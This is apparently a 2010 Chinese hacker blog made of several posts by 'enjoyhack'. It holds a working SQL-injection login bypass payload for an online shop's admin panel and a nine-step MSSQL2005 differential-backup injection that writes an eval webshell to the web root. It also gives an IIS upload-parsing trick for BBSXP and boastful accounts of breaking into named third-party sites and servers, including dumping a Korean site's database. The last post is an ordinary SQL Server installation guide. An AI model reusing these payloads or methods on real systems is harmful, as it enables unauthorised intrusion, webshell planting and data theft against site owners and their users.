      到了这里，本篇文章的高潮就过了，看到这里有眉目的朋友就可以自己动手实践下了，要是还没有眉目那就继续返回去再看一遍文章。不过对于我测试的程序那套国外商城系统还没有完，接下来我们还要继续对那套系统进行分析，因为这套程序的管理密码是不可解的，不像是使用md5加密的那样，我们自己拿个密码加密下就可以的。

      因为在绕过的时候我们提交的密码必须是密文，又因他系统不是MD5加密，所以我们要需要找到他系统使用的加密函数，把我们的密码加密才行。我们再返回去继续看DoLogin函数中密码验证的地方：

<%                          '已通过账号验证，开始密码阶段的验证
                                correctPass = rsLogin("admin_password") '取得数据库中的密文
        controlPass = hashEncode(pass & rsLogin("admin_salt")) '将用户输入的密码加密并赋给变量controlPass
        if correctPass = controlPass then '对比两个密文是否相同
            DoLogin = 1
            session("admin_user_id") = rsLogin("admin_id")
            session("session_id") = session.SessionID
            session("order_flag") = 1
        else
            DoLogin = 0
        end if
%>

      这里需要注意下controlPass = hashEncode(pass & rsLogin("admin_salt")) ，函数hashEncode就是密码的加密函数，pass是用户输入的明文密码，细心的朋友会发现，这里产生的最终密码密文不是直接加密用户输入的密文密码得到的，而是通过加密用户输入的明文密码与rsLogin("admin_salt")的值得到的，这个值可以在上文中admin_users表截图中可以看到也是加密的。这个就和国内的的程序有区别了，国内大多数都是直接加密用户输入的明文密码，然后再与数据库中密文对比的。

      这样一来，就意味着我在用户名地方构造的语句不仅要提交最终的密文还需要提交产生这个密文的一部分（及时salt），所以我们不仅要找到他最终密文的加密函数，还要找到admin_salt值的加密函数。不过这些都比较容易了，salt的加密函数可以在后台添加用户代码中找到，因为这个salt是写入到管理员表中的，肯定在添加用户的时候进行的。

      通过分析代码找到了添加用户名的函数：AddLogin，代码如下：

<%
        private function AddLogin()
    admin_login     = request.form("admin_login") '取得输入的账号
    password1       = request.form("password1") '取得输入的密码
    password2       = request.form("password2") '取得确认密码

       …………………………………………'省略若干

                 strSalt = getSalt(len(admin_login))
                 strSecret = hashEncode(password1 & strSalt)

       …………………………………………'省略若干

         rsAdmin.addnew()
    rsAdmin("admin_login")    = admin_login
    rsAdmin("admin_salt")     = strSalt
    rsAdmin("admin_password") = strSecret
          rsAdmin.update()
%>

      通过以上代码可得知，管理员表中admin_salt的值等于以上代码中变量strSalt的值，而则等于getSalt(len(admin_login))，这就是重点，这个是使用getSalt函数对admin_login值长度的一个加密，而admin_login的值是用户输入的用户名。可以得知，最终的密码密文=(用户名长度加密的密文与明文密码)的加密。现在清楚了加密函数的方式，我们就要调用它的加密函数加密一个我们自己的账号密码了。

      找到加密函数文件，随便一个程序（程序页面中需要包含加密函数文件），然后通过加密函数输出我们自定义的账号密码的密文，例如以下代码：

<%
    username="enjoyhack"
    password="hack"
    salt= getSalt(len(username))
    hash= hashEncode(password & salt)
    response.Write "Salt:"+slat+"
Hash:"+hash
%>

      这样就能输出salt和密码密文了，如下图：

得到Salt和最终密码密文后，我们就可以在登陆口使用以下语句绕过后台验证登陆到后台管理系统中了，用户名输入一下语句，密码输入hack：
' union select 1,'EDD6CF135','E37AD49EEA9C64CDE0E427C2DA7EA8BC15778F05' from admin_users where 'a'='a

具体的过程就是这样了，文章到此也结束了，方法我也是从别人的地方学来的，并非原创。只不过是对当时需到的内容深入的分析了下，有不当的地方还望多多指教，欢迎跟帖讨论！

本站模板免费共享（不再瞎折腾了！）

haifanlovely@163.com(enjoyhack) — Mon,13 Sep 2010 14:12:54 +0800

      最近发现使用我网站模板的人比较多了，但我看到过的几个站使用我模板之后根本就没弄好，整站乱七八糟的，总感觉有点对不住这个模板，虽然说模板不是什么经典之作，但这毕竟还是我自己花了点时间和精力做出来的。

      友情检测了使用我网站模板的几个站，装了下逼呢别人又说我小气了，这下就不再装逼了，我决定把本站模板免费公布吧，需要是人可以下载去用，但想好好处理下，不要弄得乱七八糟的，对不起模板。

使用方法：

      解压皮肤文件夹，然后把文件夹放到PJBLOG安装目录下的skins目录下，登陆到后台，进入插件和模板就会看到模板了，选择使用即可。

点击此处下载皮肤包

哥又来了！哈哈(www.hackerning.tk)

haifanlovely@163.com(enjoyhack) — Mon,13 Sep 2010 13:01:07 +0800

事情是这样的，刚在后台添加个友情链接的时候看到一个申请友情链接的地址，看了下地址发现还是和我网站模板一模一样。三分钟拿下之后才发现原来网站还是上篇文章hackgirl的……

呵呵！没错确实是三分钟拿下了……刚打开网站的时候就发现网站所在服务器也是主机屋的虚拟机主机。

不过查了下这个站的IP现在是95，而之前拿hackgirl的是88，不过这个也没什么问题呵呵，旁注都不需要了直接终端连接，输入账号密码，上服务器去了。

就这样了。。。蛋疼！！！！

又是一次蛋疼的入侵（www.hackgirl.net）

haifanlovely@163.com(enjoyhack) — Thu,09 Sep 2010 17:08:03 +0800

昨天晚上闲的蛋疼了，没事就鼓捣自己的blog，在后台看访客记录，在后台访客记录中，从其他网站来访的我基本上都要去看下是什么样的网站，无意中一个来源网站引起了我的注意，打开网站看到也是Pj的blog程序，而且更离奇的是网站的模板和我的一模一样。貌似我网站的皮肤只给过两个朋友。

杯具的人儿，皮肤拿去标志也没修改，还是EnjoyHack，而且模板弄得是乱七八糟的，比起我的来还是逊色了不少啊，看到这乱七八糟的页面，我真感觉对不起这个模板啊。不过还好点的到是网站上给我加上了个友情链接。

不让我看到已经看到了，到这一步不检测下实在是对不起自己。顺手把地址保存下来，整理下思路就开工了。由于是PJ的程序，直接干是不可能的了，唯一的方法就是旁注了。把网站拿到http://tool.admin2.com上去查了下（平时习惯用这个站查旁站，还是比较准确的），查询的结果还真不少。

看样子是个虚拟主机，上面的网站大部分还是一些公司企业类的小站，这样的情况拿个旁站的shell应该是没啥问题的了，随便找了个网站进行常规式的检测，扫目录，找注入。

人品还是不错，搞到第三个展的时候有了突破了，啊D扫了个我最喜欢的FCKeditor出来。

有FCKeditor首先是看test.html页面是否存在了，访问/FckEditor/editor/filemanager/connectors/test.html存在，测试了下发现是使用asp的，aspx被删除了，不过asp的能正常使用，这里列下目录就能知道。

看到列出了图片上传的目录的话基本上就没问题了，可以使用asp创建一个xx.asp的文件夹，然后再到test.html页面中上传。这些步骤就不写出来浪费篇幅了。

到这里shell就很容易的拿下来了，发现还真是个虚拟主机，而且看样子还是个比较BT的虚拟主机，居然在上面网站的每个页面底部加了版权，看到这个就感觉还是比较富有挑战性的了。

      不过还好的是能支持aspx，而且自己上传一个cmd后能执行基本的查询命令。不过想通过执行pr等程序就不行，包括VBS脚本一样。

      现在只好使用aspx搜集一些服务器的信息了，在搜集信息的过程中才发现服务器是星外的虚拟主机，看到这个顿时就感觉提权希望还真比较渺茫啊，在昨晚弄了大约一个小时后提权无果只好去睡觉了。

      今天中午忙完只有又继续昨晚未完成的任务，从利用aspx获取的服务器信息中可以看出管理员那是相当的懒啊，服务器只装了两个补丁。本想用个windows2003的溢出工具直接秒杀的，结果还是失败了。

      此处省略大约100字的提权过程……

      到此，服务器权限也沦陷了！提权过程就省略掉了，技术含量不高，主要是耐心问题，也比较容易。最后来点战果的截图吧。

BBSXP ACCESS和MSSQL版后台拿shell

haifanlovely@163.com(enjoyhack) — Tue,07 Sep 2010 19:15:43 +0800

昨天在拿一站的时候搞到了一个BBSXP MSSQL版的后台，但是拿shell刚开始还真把我给难住了，没有数据库备份，后台添加了PHP上传类型，前台发帖上传了个php的shell，但是服务器不支持php的解析。搜索网上公布的方法都是基于ACCESS后台的，利用数据库备份功能拿shell，而且目标站基本上的注入都不存在了。

本来想放弃的，后来在群经过别人的点醒，终于搞定了，而且方法非常的简单，首先我们需要在BBSXP的后台利用服务器环境功能查看下服务器的信息，这里要特别注意IIS，昨天的那个就是IIS6.0的，我们可以充分利用IIS的解析漏洞，在后台基本设置——上传设置中添加一个“asp;xx”的上传类型，然后我们再将我们的小马或者webshell的扩展名修改成该类型即可。

方法很简单，但需要attachments目录有执行脚本的权限，拿下目标站后我才发现我有时候思路还是比较死，特别是比较兴奋的状态下，往往在快要拿下目标的时候总会兴奋，一旦兴奋脑袋总觉得有点不好使！思路仅作参考，大家可以自由发挥！

MSSQL2005差异备份拿shell (MSSQL2005 Backup Get Shell)

haifanlovely@163.com(enjoyhack) — Sat,04 Sep 2010 13:05:47 +0800

      昨晚在拿站过程中遇到了个ASP+MSSQL2005的注入点，权限是DB_Owner的权限，网站路径也搞到了，本想使用差异备份，在数据库日志中插入一句话，然后备份到网站目录下拿shell的，估计是用户没有备份数据库的权限，但使用MSSQL2000的备份方法根本行不通，后来才想到MSSQL2005的备份和MSSQL2000有点不同。

      后来在网上搜半天没有找到具体的备份语句，后来在群求助，小冰才发我了具体的利用语句，但贴出来的文章貌似没啥水准，大家都知道手工差异备份是自己需要修改数据库名和网站路径的，但那个文章中对语句没有做任何解释，无奈之下我只好自己尝试了，虽然测试的网站没有成功拿下shell，单语句是没有错误的，我在本地的MSSQL2005的查询分析器中测试通过了，再次特将语句整理出来分享个大家，并做好详细的解释说明，首先来贴出语句。

第一步
;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full--

第二步：
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第三步
;drop/**/table/**/[itpro]--

第四步
;create/**/table/**/[itpro]([a]/**/image)--

第五步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第六步
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)--

第七步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

第八步
;drop/**/table/**/[itpro]--

第九步
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--

      其中红色的“Hospital”既是数据库名，这个要根据自己的情况来修改，然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容，橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”，都是使用的SQL_En的格式，另外第三步大可以不需要！他是删除itpro的表，如果第一次的话这个表是不存在的，就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”，就是使用URL编码。“/**/”就等于空格了，这个大家在学习注入的过程中应该了解，也可以更换成“%20”。

      以上的语句仅供大家参考！有不足的地方大家可以积极指正，一起探讨。文章转载请注明出处与作者！谢谢！

XP同时安装MSSQL200与MSSQL2005图解

haifanlovely@163.com(enjoyhack) — Fri,03 Sep 2010 14:02:13 +0800

      大家都知道MSSQL2005的数据库是不能拿到MSSQL2000上直接还原的，所我们要想拿MSSQL2005中的数据就要将备份的数据拿到MSSQL2005上还原。

      昨晚在拿一韩国网站的数据库时候就遇到了这个问题，本想在服务器上直接导出自己需要的数据，但数据量太多，有十万多条，导出到EXCEL只导到60000多条的时候就不行了，加之棒子的文字又不认识，在服务器上操作比较麻烦，于是打算在自己本地安装个MSSQL2005，然后再把备份数据库拿到我本地还原。由于我电脑上之前已安装过MSSQL2000，现在我想让MSSQL2000和2005共存，在下载MSSQL2005的时候都在网上翻阅了些资料，最终是经过两次的安装我才总算搞定了，本文就对安装过程做个详细的讲解，希望对用到的朋友有所帮助。

      首先我们还是要下载MSSQL2005的光盘镜像，我这里将就贴出电驴下载地址，使用迅雷下载速度很快，我本地最快速度能达到1M每秒。MSSQL2005下载地址：ed2k://|file|SQL_2005_All%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87%E5%BC%80%E5%8F%91%E7%89%88DVD.iso|1870581760|25D3E5CEFB407E7CA1036BE303AC4643|h=RRKW5CRB2GSN24WUZY5ID5ENVY75QODJ|

      下载回来后是iso的光盘镜像，这个可以直接使用RAR释放出来，接下来的工作就是安装了，在安装之前我们需要先停止之前电脑上安装的MSSQL2000，打开系统托盘处的MSSQL服务管理器，然后停止当前MSSQL服务，再将MSSQL服务管理器从系统托盘处推出。

      接下来我们到释放处的MSSQL2005目录下，运行目录下的splash.hta文件开始安装，在开始的地方我就选择“基于 x86 的操作系统 (8)”，然后进入如下界面：

这里我们选择“服务器组件、工具、联机丛书和示例(c)”进入许可协议界面，然后选择“我接受许可条款和条件”点下一步，进入安装必备软件界面。

安装完成后进入下一步等待安装程序扫描配置环境，扫描完成再点击下一步对系统配置进行检查。

这里检查的结果最好是全部为“成功”，若有某项为成功的话最好点击查看详细错误，然后网上搜索下资料解决了，完了之后点击下一步，再下一步。

到这里我是全部选择了的，然后下一步进入实例名设置界面。

到了这里才是xp上同时安装MSSQL2000和MSSQL2005最关键的地方，因为我们安装MSSQL2005的目的就是要使用MSSQL2005还原MSSQL2005的数据库，而且还要保证MSSQL2000也正常，所以我们这里在实例名这个地方就需要重命名一个新的实例，之前我安装第一次的时候就是参照网上的资料，这里选择已安装的实例，然后去选择了电脑上安装的MSSQL2000的实例，这样安装后是升级之前MSSQL200的实例，安装完成后MSSQL的版本还是2000的，没法还原2005的数据库。

实例名就随便起一个了，然后我们点击进入下一步。后面基本就是默认的了

到服务账户这个地方的时候我选择的是使用内置系统账户，去掉“为每个服务账户自定义”前面的勾，然后下一步，然后到身份验证的地方。

这里我选择的是使用“Windows 身份验证模式”，然后下一步，再下一步就进入安装了，安装过程大概需要十几分钟到二十分钟左右。安装完成了我们就可以使用SQL Server Management Studio工具同时连接我们的MSSQL2000的实例和MSSQL2005的实例了。

      打开SQL Server Management Studio时候，在“服务器名称”哪里的下拉菜单中选择“浏览更多”，然后就可以看到我们MSSQL2000和刚安装的MSSQL2005实例的，要使用那个就选择那个即可。当然之前的MSSQL2000也可以使用MSSQL2000的企业管理器来连接了。

      网上对xp同时安装MSSQL2000和MSSQL2005的详细文章很少，我在安装之前搜索出来的都不是很靠谱的，基本都是一两篇文章转载去转载过来的，而且也不是详细的安装过程，现在把这个过程写出来希望对需要同时用到MSSQL2000和MSSQL2005的朋友有所帮助。

      文章中的安装过程均为笔者在自己电脑上的全部过程，有什么不当的地方欢迎指正，另欢迎转载本文，但转载时请注明出处与作者，谢谢！

pghost:
pgport:
dbname:
username:
password: